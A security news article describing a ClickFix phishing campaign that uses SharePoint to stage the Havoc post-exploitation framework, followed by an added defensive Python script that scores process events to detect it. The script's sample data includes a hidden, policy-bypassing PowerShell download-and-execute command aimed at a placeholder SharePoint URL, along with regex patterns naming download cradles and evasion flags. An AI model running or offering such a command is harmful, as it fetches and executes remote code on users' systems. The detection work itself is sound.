- Security researchers have spotted a new ClickFix campaign
- The objective is to deploy the Havoc post-exploitation framework
- The framework is staged on a Microsoft SharePoint account
Hackers have been seen abusing Microsoft SharePoint to distribute the Havoc post-exploitation framework in a new ClickFix phishing attack.
Researchers at FortiGuard Labs, who have been tracking the campaign since last year, noted that ClickFix is a type of scam most of us have probably run into at least once. The attackers compromise a website and add an overlay that displays a fake error message (for example: "Your browser is out of date; to display this page's content, you must update it"). The fake message pushes the victim to take an action, which usually ends in downloading and running malware, or in handing over sensitive information such as passwords or banking details.
This campaign is similar, although it requires a little more activity on the victim's side. The attack chain begins with a phishing email carrying a "Restricted Notice" as an .html attachment. Opening the attachment displays a fake error reading "Failed to connect to OneDrive: update the DNS cache manually". The page also has a "How to fix" button that copies a PowerShell command to the Windows clipboard and then shows instructions on how to paste and run it.
The growing threat of ClickFix
Running that command fetches and executes a second script, hosted on the attackers' SharePoint site, which in turn downloads a Python script that deploys the Havoc post-exploitation framework as a .DLL file.
Havoc is an open-source post-exploitation framework built for advanced red teaming and adversary simulation, providing modular capabilities for stealthy command and control (C2) operations. It offers features such as in-memory execution, encrypted communications, and evasion techniques intended to bypass modern security defenses.
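The chain described above leaves one reliable fingerprint on the endpoint: a PowerShell process whose command line contains a download cradle pointing at a sharepoint.com URL, launched by the user rather than by a script or installer. The following is an added detection example written for this article, not code from FortiGuard Labs or from the Havoc project. It scores Sysmon-style process-creation events (the field names and the four sample events are constructed for illustration). The assumption that the pasted command is run from the Run dialog, and therefore has explorer.exe as its parent, is a common ClickFix pattern but is not stated in the article, so it is weighted as one signal among several rather than a hard requirement.

```python
import re

# Constructed Sysmon EventID 1-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {   # ClickFix-style: user pastes a cradle that pulls a stager from SharePoint
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": 'powershell -w hidden -ep bypass -c "iwr '
                        'https://contoso-my.sharepoint.com/personal/user/Documents/update.ps1 | iex"',
    },
    {   # Benign admin use from a shell
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": 'powershell.exe -Command "Get-Service -Name Spooler"',
    },
    {   # Cradle, but internal host and no evasion flags: worth a look, not an alert
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": 'powershell -c "Invoke-WebRequest https://intranet.example.net/tools.ps1 -OutFile tools.ps1"',
    },
    {   # Unrelated process started from the desktop
        "image": r"C:\Windows\System32\notepad.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "notepad.exe readme.txt",
    },
]

# Download-and-execute primitives commonly seen in pasted one-liners.
CRADLE = re.compile(
    r"(?i)(invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient"
    r"|invoke-expression|\biex\b|\bcurl\b|\bwget\b|start-bitstransfer)"
)
# Any URL on a sharepoint.com tenant, the staging location named in the article.
SHAREPOINT_URL = re.compile(r"(?i)https?://[^\s\"']*sharepoint\.com")
# Flags that hide the window or sidestep execution policy.
EVASION_FLAGS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)?\s+bypass|-enc(odedcommand)?\b|-nop\b)"
)


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    image = event["image"].lower()
    parent = event["parent_image"].lower()
    cmd = event["command_line"]

    if image.endswith(("powershell.exe", "pwsh.exe")):
        score += 1
        reasons.append("powershell host")
    if CRADLE.search(cmd):
        score += 2
        reasons.append("download cradle in command line")
    if SHAREPOINT_URL.search(cmd):
        score += 1
        reasons.append("sharepoint.com URL in command line")
    if parent.endswith("explorer.exe"):
        # Assumption: the victim pasted the command into the Run dialog,
        # so the parent is the shell rather than a script host or installer.
        score += 1
        reasons.append("parent is explorer.exe (assumed Run-dialog paste)")
    if EVASION_FLAGS.search(cmd):
        score += 1
        reasons.append("hidden window / policy bypass flags")
    return score, reasons


def triage(events, threshold=4):
    """Return alerts for every event whose score reaches the threshold."""
    alerts = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"score": score, "reasons": reasons,
                           "command_line": event["command_line"]})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["score"], "|", "; ".join(alert["reasons"]))
        print("   ", alert["command_line"])
```

The scoring is deliberately additive so that a legitimate SharePoint download from an admin shell (score 3) does not fire on its own, while the user-initiated, hidden-window cradle to a SharePoint tenant (score 6) does. In a real deployment the same logic maps directly onto a SIEM query over process-creation telemetry, and the RunMRU registry key can corroborate the Run-dialog assumption.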
ClickFix has become extremely popular in recent months. At the end of October last year, a new malware variant was observed compromising thousands of WordPress websites, installing a malicious plugin that served the ClickFix lure.
A few weeks earlier, researchers saw fake Google Meet call pages, which were also a variant of the ClickFix attack.
Via BleepingComputer